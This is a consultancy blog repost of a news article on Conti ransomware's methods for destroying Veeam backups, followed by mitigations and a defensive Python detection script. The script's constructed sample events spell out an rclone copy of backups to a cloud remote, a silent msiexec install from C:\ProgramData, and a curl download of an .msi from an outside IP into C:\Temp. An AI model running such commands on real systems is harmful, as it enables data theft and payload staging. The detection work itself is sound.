The Cloud Consultancy Europe Ltd.
+44 (0) 203 637 6667

The Conti ransomware gang has developed novel tactics to demolish backups, especially the Veeam recovery software.

Good at identifying and obliterating backups? Speak Russian? The notorious Conti ransomware group may find you a fine hiring prospect.

That’s according to a report published on Wednesday by cyber-risk prevention firm Advanced Intelligence, which details how Conti has honed its backup destruction to a fine art. After all, backups are a major obstacle to encouraging ransomware payment.

A Conti Primer

Palo Alto Networks has described the gang as a standout, and not in a good way: “It’s one of the most ruthless of the dozens of ransomware gangs that we follow,” the firm said.

As of June, Conti had spent more than a year attacking organizations where IT outages can threaten lives: hospitals, emergency-number dispatch carriers, emergency medical services and law-enforcement agencies.

An example: In May, Ireland’s department of health services was still reeling a week after a Conti ransomware attack that wasn’t even all that successful. Officials said at the time that the attack would cost tens of millions of Euros to repair, even though the attackers didn’t even manage to encrypt systems.

Its expertise in demolishing backups has helped Conti – a top-tier Russian-speaking ransomware group that specializes in double extortion – to rain down destruction. According to AdvIntel’s Yelisey Boguslavskiy and Vitali Kremez, Conti bases its negotiation strategies on the premise that the majority of targets who pay the ransom are “motivated primarily by the need to restore their data.”

The two-slap whammy of double extortion entails both data encryption and the threat to publish that seized data. However, according to AdvIntel’s collection of Conti ransomware samples, publishing of data is only a secondary motivator for paying up – most particularly if those victims can rely on backups.

“If the victim has the ability to restore the files via backups, the chances of successful ransom payment to Conti will be minimized, even despite the fact that the risk of data-publishing persists,” the researchers wrote.

Conti’s Backup-Obliteration Methodology

AdvIntel has found that Conti builds its backup-removal expertise from the ground up, starting at the “team development level.” Namely, when the ransomware-as-a-service (RaaS) gang recruits workers to invade networks, it’s clear that penetration-tester candidates need top-notch skills at finding and obliterating backups.

“While selecting network intruders for their divisions also known as ‘teams,’ Conti is particularly clear that experience related to back-up identification, localization and deactivation is among their top priorities for a successful pen-tester,” according to AdvIntel’s analysis. “This backup focus implemented within the partnership-building process enables Conti to assemble teams, equipped with knowledge and skills aimed at backup removal.”

Veeam Vivisection

Conti has focused most particularly on developing new ways to compromise back-up software from disaster-recovery firm Veeam, researchers said.

Conti routinely initiates its attacks by installing the Cobalt Strike beacon: a legitimate, commercially available tool originally designed for network-penetration testers. Its use by crooks as a backdoor has gone mainstream in the world of crimeware, however.

Conti then leverages another legitimate tool: the remote-management agent Atera. Atera gives the gang persistence in an infected network.

Conti also uses Ngrok, a cross-platform application that exposes local server ports to the internet, to establish a tunnel to the local host for data exfiltration.

In many attacks seen by AdvIntel, this infection routine is followed by Conti operators finding and impersonating a privileged backup user — in order to grant themselves Veeam-backup privileges.

The attackers then typically use a weaponized Rclone – a command line program used to manage files on cloud storage – for data exfiltration of the Veeam backups. Finally, to ensure that the victim has been kneecapped and won’t be able to recover, the Conti attackers lock the victim’s system and manually remove those Veeam backups.

AdvIntel outlined the backup removal steps in the chart below:

Cobalt Strike backup removal sequence. Source: AdvIntel.

“With the Veeam account compromise, Conti has a method to deal with back-up software to ‘force’ ransom payment,” according to the firm’s writeup.

Veeam’s Response

Veeam responded to AdvIntel’s findings by saying that there’s not much the firm can do after the attackers have taken over a domain admin account. The company’s statement:

“When the attackers have access to the domain admin account there is little [Veeam] can do to protect our installation. That’s why we usually recommend using a separate domain to run backup software, this could protect [a Veeam] instance in case … the primary domain is compromised. Another approach to protect from ransomware would be to use immutable repositories, [which] can be considered safe (if configured correctly), because they allow only appending new data, not altering/purging existing backups.” —Veeam statement.

How to Stop Conti’s Backup Destruction

AdvIntel offered these mitigations and recommendations to help fend off Conti backup removal attacks:

    1. To prevent attack initiation, employee training and email security protocols should be implemented. Conti uses highly developed social-engineering techniques to convince the targeted employees that its emails are legitimate.
    2. Sometimes Conti uses corporate VPN compromise and TrickBot delivery as an alternative means of attack initiation. Tracking externally exposed endpoints is therefore critical.
    3. To prevent lateral movement, network-hierarchy protocols should be implemented with network segregation and decentralization.
    4. Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies, with the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts — particularly those from the C:\ProgramData and C:\Temp directories.
    5. Rclone and other data-exfiltration command-line activity can be captured through proper logging of process execution with command-line arguments.
    6. Special security protocols, password updates and account-security measures for Veeam should be implemented to prevent Veeam account takeover. Functioning backups tremendously decrease Conti’s ransom demands and can likely lead to data recovery with zero payments to the Conti collective.
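Items 4 and 5 above only pay off if someone actually looks at the process-creation logs. The following is an added illustration (not from the article, AdvIntel or Veeam) of what that triage can look like: three simple rules run over constructed Sysmon-style process events, flagging Rclone pushing data to a cloud remote, msiexec installing a package staged in C:\ProgramData or C:\Temp, and curl writing a download to disk. Rule names, field names and the sample events are all assumed for the demonstration.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (Sysmon Event ID 1 / Windows
# 4688 style fields). These are illustrative, not telemetry from any case.
SAMPLE_EVENTS = [
    {"user": "CORP\\svc_backup", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r'rclone.exe copy "D:\VeeamBackups" mega:dump --transfers 8'},
    {"user": "CORP\\jdoe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\ProgramData\update.msi /qn"},
    {"user": "CORP\\jdoe", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Temp\update.msi http://198.51.100.7/update.msi"},
    {"user": "CORP\\alice", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i \\fileserver\software\7zip.msi /qn"},  # benign
]

# Directories the article singles out as staging locations for rogue installers.
STAGING_DIRS = ("c:\\programdata\\", "c:\\temp\\")

def _in_staging(path: str) -> bool:
    return path.lower().startswith(STAGING_DIRS)

def check_event(ev: dict) -> list[str]:
    """Return the names of the rules one process event triggers ([] if none)."""
    hits = []
    exe = PureWindowsPath(ev["image"]).name.lower()
    cmd = ev["cmdline"]
    # Rule 1: rclone using a transfer verb with a configured cloud remote
    # ("mega:", "s3:", ...). Single-letter 'remotes' are drive letters, not remotes.
    if exe == "rclone.exe" or cmd.lower().startswith("rclone"):
        if re.search(r"\b(copy|sync|move|copyto)\b.*\s(\w{2,}):", cmd):
            hits.append("rclone_cloud_exfil")
    # Rule 2: msiexec installing a package that lives in a staging directory.
    if exe == "msiexec.exe":
        for pkg in re.findall(r"[\w:\\.\-]+\.msi", cmd, re.IGNORECASE):
            if _in_staging(pkg):
                hits.append("msi_from_staging_dir")
                break
    # Rule 3: curl writing a download to disk; escalate if it lands in staging.
    if exe == "curl.exe":
        m = re.search(r"(?:-o|--output)\s+(\S+)", cmd)
        if m:
            hits.append("curl_download_to_staging" if _in_staging(m.group(1))
                        else "curl_download")
    return hits

def scan(events: list[dict]) -> list[tuple[str, str, str]]:
    """Flatten all (user, command line, rule) alerts across a batch of events."""
    return [(ev["user"], ev["cmdline"], h) for ev in events for h in check_event(ev)]

if __name__ == "__main__":
    for user, cmdline, rule in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {user}: {cmdline}")
```

A renamed Rclone binary defeats the image-name check in rule 1, which is why the verb-plus-remote pattern in the command line, not the file name, carries the detection.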

Source: ThreatPost

Protect your environment from Ransomware attacks.

Educating yourself and your employees with Cyber Security Awareness Training is the best way to start ensuring your business is protected from cyber-attacks.

Learn more about how The Cloud Consultancy can address and manage your business’s cyber-security headaches. We can now provision boutique, proactive IT support services 24/7/365.